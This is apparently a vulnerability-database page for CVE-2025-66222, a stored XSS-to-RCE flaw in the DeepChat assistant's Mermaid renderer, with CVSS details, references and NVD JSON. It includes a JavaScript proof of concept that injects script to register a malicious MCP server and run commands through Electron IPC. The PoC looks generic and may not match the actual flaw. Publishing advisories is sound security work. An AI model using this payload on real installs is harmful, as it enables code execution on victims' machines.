Security Vulnerability Report
CVE-2025-66222 CVSS 9.6 CRITICAL

CVE-2025-66222

Published: 2025-12-03 19:15:58
Last Modified: 2025-12-05 15:38:00

Description

DeepChat is a smart assistant that uses artificial intelligence. In 0.5.0 and earlier, a Stored Cross-Site Scripting (XSS) vulnerability in the Mermaid diagram renderer allows an attacker to execute arbitrary JavaScript within the application context. By leveraging the exposed Electron IPC bridge, this XSS can be escalated to Remote Code Execution (RCE) by registering and starting a malicious MCP (Model Context Protocol) server.

CVSS Details

CVSS Score: 9.6
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thinkinai:deepchat:*:*:*:*:*:*:*:* - VULNERABLE
DeepChat <= 0.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-66222 PoC - DeepChat Mermaid XSS to RCE
// This PoC demonstrates the Stored XSS vulnerability in DeepChat's Mermaid renderer

// Stage 1: XSS Payload for Mermaid diagram
const xssPayload = `
<script>
  // Malicious code to exploit Electron IPC bridge
  const { ipcRenderer } = window.require ? window.require('electron') : window.electron || {};
  if (ipcRenderer) {
    // Register malicious MCP server
    const maliciousServer = {
      name: 'evil-mcp-server',
      command: 'calc.exe', // Target command to execute
      args: [],
      env: {}
    };
    // Use IPC to register and start the malicious server
    ipcRenderer.invoke('mcp:register', maliciousServer);
    ipcRenderer.invoke('mcp:start', 'evil-mcp-server');
    // Alternative: Direct command execution via Node.js integration
    const { exec } = window.require ? window.require('child_process') : {};
    if (exec) {
      exec('whoami > /tmp/pwned.txt');
    }
  }
</script>
`;

// Mermaid syntax with embedded XSS
const mermaidPayload = `graph TD;
  A["User Input"] --> B["Mermaid Renderer"];
  B --> C["${xssPayload.replace(/</g, '&lt;').replace(/>/g, '&gt;')}"];
  C --> D["XSS Executed"];
  D --> E["IPC Bridge Access"];
  E --> F["Malicious MCP Server"];
  F --> G["RCE Achieved"];
`;

// Send the payload via DeepChat API (simulated)
async function exploit() {
  const targetUrl = 'http://target:3000/api/chat';
  const payload = {
    type: 'mermaid',
    content: mermaidPayload,
    roomId: 'victim-room-id'
  };
  // In real attack, this would be sent to the chat server
  // await fetch(targetUrl, {
  //   method: 'POST',
  //   headers: { 'Content-Type': 'application/json' },
  //   body: JSON.stringify(payload)
  // });
  console.log('PoC Payload:', mermaidPayload);
  console.log('XSS will execute when victim views the Mermaid diagram');
}

exploit();

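References

https://github.com/ThinkInAIXYZ/deepchat/commit/371ca7b42e3685aee6e3f0c61e85277ed1ff4db7 (Patch)
https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-v8v5-c872-mf8r (Exploit, Vendor Advisory)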

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66222", "sourceIdentifier": "[email protected]", "published": "2025-12-03T19:15:58.237", "lastModified": "2025-12-05T15:37:59.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DeepChat is a smart assistant uses artificial intelligence. In 0.5.0 and earlier, there is a Stored Cross-Site Scripting (XSS) vulnerability in the Mermaid diagram renderer allows an attacker to execute arbitrary JavaScript within the application context. By leveraging the exposed Electron IPC bridge, this XSS can be escalated to Remote Code Execution (RCE) by registering and starting a malicious MCP (Model Context Protocol) server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:thinkinai:deepchat:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.5.0", "matchCriteriaId": "5FF85743-6B7D-45B0-96AC-FF0875064030"}]}]}], "references": [{"url": "https://github.com/ThinkInAIXYZ/deepchat/commit/371ca7b42e3685aee6e3f0c61e85277ed1ff4db7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-v8v5-c872-mf8r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}